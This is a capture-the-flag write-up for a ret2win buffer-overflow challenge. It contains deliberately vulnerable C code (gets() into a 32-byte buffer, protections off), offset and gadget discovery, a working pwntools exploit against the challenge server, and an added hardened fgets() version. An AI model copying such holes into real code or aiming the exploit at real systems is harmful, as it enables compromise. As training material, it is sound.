We can see that there is an admin() function, but main() never calls it.
There is also a buffer overflow vulnerability at the gets() call, which reads an unbounded line into the 32-byte name buffer.
Protections
PIE and the stack canary are disabled, so we can perform a ret2win attack: overwrite the saved return address with the fixed address of admin().
Finding buffer size
GDB
I will be using pwndbg as my debugger for this challenge
Firstly, let's generate a cyclic string of length 100.
Next, let's run the program and input it into the name field.
Whoops! We have got a segmentation fault. Let's inspect the value of ret that we overwrote.
Our offset to the saved return address is 40 bytes.
Ret gadget
Due to a stack alignment issue known as the MOVAPS issue (https://ropemporium.com/guide.html, under common pitfalls), we shall add an extra ret gadget into our payload. Jumping straight to admin() leaves rsp misaligned by 8 bytes, and library code such as system() may then fault on a movaps instruction; the extra ret pops one more 8-byte word and restores 16-byte alignment.
/*
Compile options:
gcc headquarters2.c -o headquarters2 -fno-stack-protector -no-pie -D_FORTIFY_SOURCE=0
*/
#include <stdio.h>
#include <stdlib.h>

/* never called from main(): the ret2win target */
void admin()
{
    printf("Welcome admin.\n");
    puts("Here is your flag: ");
    system("cat flag");
}

int main()
{
    char name[32];
    printf("Welcome to Sieberrsec's headquarters!\n");
    printf("Enter your name: ");
    gets(name); /* unbounded read into a 32-byte buffer: the overflow */
    printf("\nHello %s, welcome to Sieberrsec headquarters.\n", name);
    return 0;
}
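As an added example that is not part of the original writeup or the challenge source, here is the same program with the gets() call replaced by a bounded fgets() read. The names read_name(), read_name_from_string() and NAME_LEN are chosen here for illustration; read_name_from_string() uses POSIX fmemopen() so constructed input can be fed through the reader without a terminal. Input longer than the buffer is cut and the rest of the line is discarded, so the name field can no longer reach the saved return address.

```c
/* Added example (not from the original writeup): headquarters2 with the
 * gets() call replaced by a bounded read. Oversized input is truncated and
 * the remainder of the line is drained, so the stack frame past name[]
 * (saved rbp, saved return address) is never written. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define NAME_LEN 32   /* same buffer size as the challenge binary */

/* Read one line from `in` into buf[bufsz]. Returns 1 if a line was read and
 * 0 on EOF before any data. The trailing newline is stripped. If the line
 * did not fit, the remainder is drained and *truncated is set to 1. */
int read_name(FILE *in, char *buf, size_t bufsz, int *truncated)
{
    *truncated = 0;
    if (bufsz == 0)
        return 0;
    if (fgets(buf, (int)bufsz, in) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    /* No newline: the line was longer than bufsz-1 bytes, or input ended at
     * EOF. Drain the rest so it cannot be misread as the next input. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *truncated = 1;
    return 1;
}

/* Helper (assumed name): feed a constructed string through read_name()
 * via fmemopen(). Returns read_name()'s result, or -1 if fmemopen() fails. */
int read_name_from_string(const char *s, char *buf, size_t bufsz, int *truncated)
{
    FILE *f = fmemopen((void *)s, strlen(s), "r");
    if (f == NULL)
        return -1;
    int rc = read_name(f, buf, bufsz, truncated);
    fclose(f);
    return rc;
}

int main(void)
{
    char name[NAME_LEN];
    int truncated;
    printf("Welcome to Sieberrsec's headquarters!\n");
    printf("Enter your name: ");
    if (!read_name(stdin, name, sizeof name, &truncated))
        return 1;
    if (truncated)
        fprintf(stderr, "warning: name longer than %d bytes was cut\n", NAME_LEN - 1);
    printf("\nHello %s, welcome to Sieberrsec headquarters.\n", name);
    return 0;
}
```

With this version the 48-byte payload from the writeup (40 bytes of padding plus the two 8-byte addresses) is cut to 31 characters and the program exits normally. Note that fgets() alone is only half the fix: without draining the rest of the line, the leftover bytes would be consumed by the next read, which is why read_name() discards them explicitly.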
# pwn checksec headquarters2
[*] '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Radare2
[0x004010b0]> /R ret
0x0040100e 004885 add byte [rax - 0x7b], cl
0x00401011 c07402ffd0 sal byte [rdx + rax - 1], 0xd0
0x00401016 4883c408 add rsp, 8
0x0040101a c3 ret <--- the one we will be using
[...]
from pwn import *
context.binary = binary = ELF("./headquarters2")
p = process()                                  # local run of ./headquarters2 for testing
p = remote("challs.sieberr.live", 1004)        # server location (replaces the local process)
hidden_function = p64(binary.symbols.admin)    # address of admin(), fixed since PIE is disabled
retgadget = p64(0x40101a)                      # lone ret gadget to restore 16-byte stack alignment
payload = b"A" * 40 + retgadget + hidden_function  # 40 bytes of padding reach the saved return address
p.sendline(payload)
p.interactive()
# python3 solve.py
[*] '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process '/mnt/f/sieberrctf/PWN/headquartersimproved/headquarters2': pid 6674
[+] Opening connection to challs.sieberr.live on port 1004: Done
[*] Switching to interactive mode
Welcome to Sieberrsec's headquarters!
Enter your name:
Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, welcome to Sieberrsec headquarters.
Welcome admin.
Here is your flag:
sctf{st0p_br34k1n9_1n_9uy5}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$